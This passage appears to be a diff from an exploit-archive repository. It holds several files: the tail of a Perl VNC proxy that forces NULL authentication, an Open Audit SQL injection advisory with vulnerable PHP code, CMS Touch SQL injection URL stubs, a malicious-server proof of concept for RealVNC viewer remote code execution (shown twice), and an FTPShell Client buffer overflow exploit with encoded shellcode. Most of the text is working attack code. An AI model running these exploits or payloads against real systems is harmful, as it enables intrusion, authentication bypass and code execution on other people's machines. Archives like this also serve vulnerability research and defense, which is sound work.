if ($res !~ /^RFB 003\.008/) {
$self->PrintLine("[*] The remote VNC service is not vulnerable");
$fd->Close;
$s->Close;
return;
}
# Send it to the client
$fd->Send($res);
# Hello from client
$res = $fd->Recv(-1, 5);
if ($res !~ /^RFB /) {
$self->PrintLine("[*] The local VNC client appears to be broken");
$fd->Close;
$s->Close;
return;
}
# Send it to the server
$s->Send($res);
# Read the authentication methods from the server
$res = $s->Recv(-1, 5);
# Tell the client that the server only supports NULL auth
$fd->Send("\x01\x01");
# Start pumping data between the client and server
if (! fork()) {
$self->PrintLine("[*] Proxying data between the connections...");
$self->VNCProxy($s->Socket, $fd->Socket);
exit(0);
}
return;
}
sub VNCProxy {
my $self = shift;
my $srv = shift;
my $cli = shift;
foreach ($srv, $cli) {
$_->blocking(1);
$_->autoflush(1);
}
my $selector = IO::Select->new($srv, $cli);
LOOPER:
while(1) {
my @ready = $selector->can_read;
foreach my $ready (@ready) {
if($ready == $cli) {
my $data;
$cli->recv($data, 8192);
last LOOPER if (! length($data));
last LOOPER if(!$srv || !$srv->connected);
eval { $srv->send($data); };
last LOOPER if $@;
}
elsif($ready == $srv) {
my $data;
$srv->recv($data, 8192);
last LOOPER if(!length($data));
last LOOPER if(!$cli || !$cli->connected);
eval { $cli->send($data); };
last LOOPER if $@;
}
}
}
}
1;
# milw0rm.com [2006-05-15]

55
platforms/php/webapps/39150.txt Executable file
View file

@ -0,0 +1,55 @@
#Exploit Title : Open Audit SQL Injection Vulnerability
#Exploit Author : Rahul Pratap Singh
#Date : 2/Jan/2016
#Home page Link : https://github.com/jonabbey/open-audit
#Website : 0x62626262.wordpress.com
#Twitter : @0x62626262
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
1. Description
"id" field in software_add_license.php is not properly sanitized, that
leads to SQL Injection Vulnerability.
"pc" field in delete_system.php, list_viewdef_software_for_system.php and
system_export.php is not properly sanitized, that leads to SQL Injection
Vulnerability.
2. Vulnerable Code:
software_add_license.php: ( line 12 to 13)
$sql = "SELECT * from software_register WHERE software_reg_id = '" .
$_GET["id"] . "'";
$result = mysql_query($sql, $db);
delete_system.php: ( line 5 to 10)
if (isset($_GET['pc'])) {
$link = mysql_connect($mysql_server, $mysql_user, $mysql_password) or
die("Could not connect");
mysql_select_db("$mysql_database") or die("Could not select database");
$query = "select system_name from system where system_uuid='" .
$_GET['pc'] . "'";
$result = mysql_query($query) or die("Query failed at retrieve system
name stage.");
list_viewdef_software_for_system.php: ( line 2 to 3)
$sql = "SELECT system_os_type FROM system WHERE system_uuid = '" .
$_REQUEST["pc"] . "'";
$result = mysql_query($sql, $db);
system_export.php: ( line 108 to 112)
if(isset($_REQUEST["pc"]) AND $_REQUEST["pc"]!=""){
$pc=$_REQUEST["pc"];
$_GET["pc"]=$_REQUEST["pc"];
$sql = "SELECT system_uuid, system_timestamp, system_name FROM system
WHERE system_uuid = '$pc' OR system_name = '$pc' ";
$result = mysql_query($sql, $db);

9
platforms/php/webapps/39178.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/67377/info
CMS Touch is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS Touch 2.01 is vulnerable; other versions may also be affected.
http://www.example.com/cmstouch/pages.php?Page_ID=[SQL]

9
platforms/php/webapps/39179.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/67377/info
CMS Touch is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS Touch 2.01 is vulnerable; other versions may also be affected.
http://www.example.com/cmstouch/news.php?do=show&News_ID=[SQL]

14
platforms/windows/dos/39180.pl Executable file
View file

File diff suppressed because one or more lines are too long

24
platforms/windows/dos/39181.py Executable file
View file

File diff suppressed because one or more lines are too long

14
platforms/windows/dos/39183.py Executable file
View file

File diff suppressed because one or more lines are too long

106
platforms/windows/dos/7943.py
View file

@ -1,53 +1,53 @@
#!/usr/bin/env python
# POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499
#Author: Andres Lopez Luksenberg <polakocai@gmail.com>
#
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.008\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x01\x01'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data = '\x00\x00\x00\x00'
clientsocket.sendall(data)
data = '\x02\xd0\x01\x77\x08\x08\x00\x00\x00\x07\x00\x07\x00\x03\x00\x03\x06\x00\x00\x00\x00\x00\x00\x13\x4c\x69\x6e\x75\x78\x56\x4e\x43\x3a\x20\x2f\x64\x65\x76\x2f\x74\x74\x79\x32'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data='\x00\x00\x00\x03\x00\x03\x00\x03\x00\x08\x00\x07'
data = data + '\x00\x00\xff\xff' #bug
data = data + '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe7\xe7\x7e\x3c\x7e\xe7\xe7'
clientsocket.sendall(data)
clientsocket.close()
serversocket.close()
# milw0rm.com [2009-02-02]
#!/usr/bin/env python
# POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499
#Author: Andres Lopez Luksenberg <polakocai@gmail.com>
#
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.008\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x01\x01'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data = '\x00\x00\x00\x00'
clientsocket.sendall(data)
data = '\x02\xd0\x01\x77\x08\x08\x00\x00\x00\x07\x00\x07\x00\x03\x00\x03\x06\x00\x00\x00\x00\x00\x00\x13\x4c\x69\x6e\x75\x78\x56\x4e\x43\x3a\x20\x2f\x64\x65\x76\x2f\x74\x74\x79\x32'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data='\x00\x00\x00\x03\x00\x03\x00\x03\x00\x08\x00\x07'
data = data + '\x00\x00\xff\xff' #bug
data = data + '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe7\xe7\x7e\x3c\x7e\xe7\xe7'
clientsocket.sendall(data)
clientsocket.close()
serversocket.close()
# milw0rm.com [2009-02-02]

79
platforms/windows/local/39159.py Executable file
View file

@ -0,0 +1,79 @@
# Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow
# Google Dork: N/A
# Date: 2015-01-04
# Exploit Author: INSECT.B
# Twitter : @INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# Blog : http://binsect00.tistory.com
# Vendor Homepage: www.ftpshell.com
# Software Link: http://www.ftpshell.com/download.htm
# Version: 5.24
# Tested on: Windows7 Ultimate SP1 K x86
# CVE : N/A
"""
[+] Type : Buffer Overflow
[-] ftpsehll client has a buffer overlow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field
[-] used to add session to favorites list .
[+]Crash : input 'A' x 1500 to Session name field
[-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)
[-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c
[-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
[-] cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
[-] 41414141 ?? ???
"""
import struct
junk = "A"*460
junk2 = "\x90"*248
esp = "\x0B\xD4\xDF\x73" # JMP ESP
#shellcode
#CMD : calc.exe
#encoder : Alpha-mix encoder
#buffer register : esp
sc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x38\x68" +
"\x4b\x32\x33\x30\x75\x50\x63\x30\x65\x30\x6c\x49\x5a\x45" +
"\x65\x61\x39\x50\x35\x34\x4c\x4b\x46\x30\x54\x70\x4e\x6b" +
"\x63\x62\x46\x6c\x6e\x6b\x43\x62\x47\x64\x4c\x4b\x44\x32" +
"\x46\x48\x74\x4f\x4f\x47\x51\x5a\x37\x56\x35\x61\x59\x6f" +
"\x6e\x4c\x45\x6c\x43\x51\x53\x4c\x43\x32\x44\x6c\x65\x70" +
"\x5a\x61\x5a\x6f\x74\x4d\x37\x71\x6a\x67\x4a\x42\x39\x62" +
"\x76\x32\x42\x77\x6c\x4b\x31\x42\x36\x70\x4e\x6b\x33\x7a" +
"\x57\x4c\x6e\x6b\x32\x6c\x66\x71\x42\x58\x78\x63\x53\x78" +
"\x73\x31\x7a\x71\x36\x31\x4e\x6b\x66\x39\x51\x30\x36\x61" +
"\x59\x43\x6e\x6b\x57\x39\x62\x38\x58\x63\x45\x6a\x52\x69" +
"\x6c\x4b\x44\x74\x4e\x6b\x55\x51\x7a\x76\x70\x31\x69\x6f" +
"\x6c\x6c\x6f\x31\x48\x4f\x36\x6d\x65\x51\x7a\x67\x76\x58" +
"\x59\x70\x61\x65\x48\x76\x53\x33\x71\x6d\x4b\x48\x35\x6b" +
"\x61\x6d\x36\x44\x31\x65\x4b\x54\x30\x58\x6e\x6b\x66\x38" +
"\x76\x44\x56\x61\x4e\x33\x51\x76\x6c\x4b\x74\x4c\x72\x6b" +
"\x6e\x6b\x71\x48\x47\x6c\x57\x71\x7a\x73\x4c\x4b\x66\x64" +
"\x6e\x6b\x36\x61\x6e\x30\x4d\x59\x50\x44\x57\x54\x66\x44" +
"\x63\x6b\x71\x4b\x61\x71\x63\x69\x61\x4a\x36\x31\x39\x6f" +
"\x59\x70\x61\x4f\x61\x4f\x52\x7a\x4c\x4b\x64\x52\x5a\x4b" +
"\x6e\x6d\x31\x4d\x32\x4a\x75\x51\x6c\x4d\x4b\x35\x48\x32" +
"\x75\x50\x65\x50\x67\x70\x66\x30\x73\x58\x65\x61\x4c\x4b" +
"\x52\x4f\x6b\x37\x59\x6f\x48\x55\x4d\x6b\x38\x70\x78\x35" +
"\x59\x32\x33\x66\x72\x48\x79\x36\x5a\x35\x6d\x6d\x4d\x4d" +
"\x6b\x4f\x58\x55\x45\x6c\x33\x36\x61\x6c\x76\x6a\x6b\x30" +
"\x6b\x4b\x4d\x30\x54\x35\x45\x55\x4f\x4b\x62\x67\x37\x63" +
"\x70\x72\x70\x6f\x70\x6a\x45\x50\x46\x33\x69\x6f\x49\x45" +
"\x50\x63\x65\x31\x50\x6c\x71\x73\x46\x4e\x42\x45\x70\x78" +
"\x73\x55\x75\x50\x41\x41"
)
payload = junk + esp + sc + junk2
file=open("C:\\shelll","w")
file.write(payload)
file.close()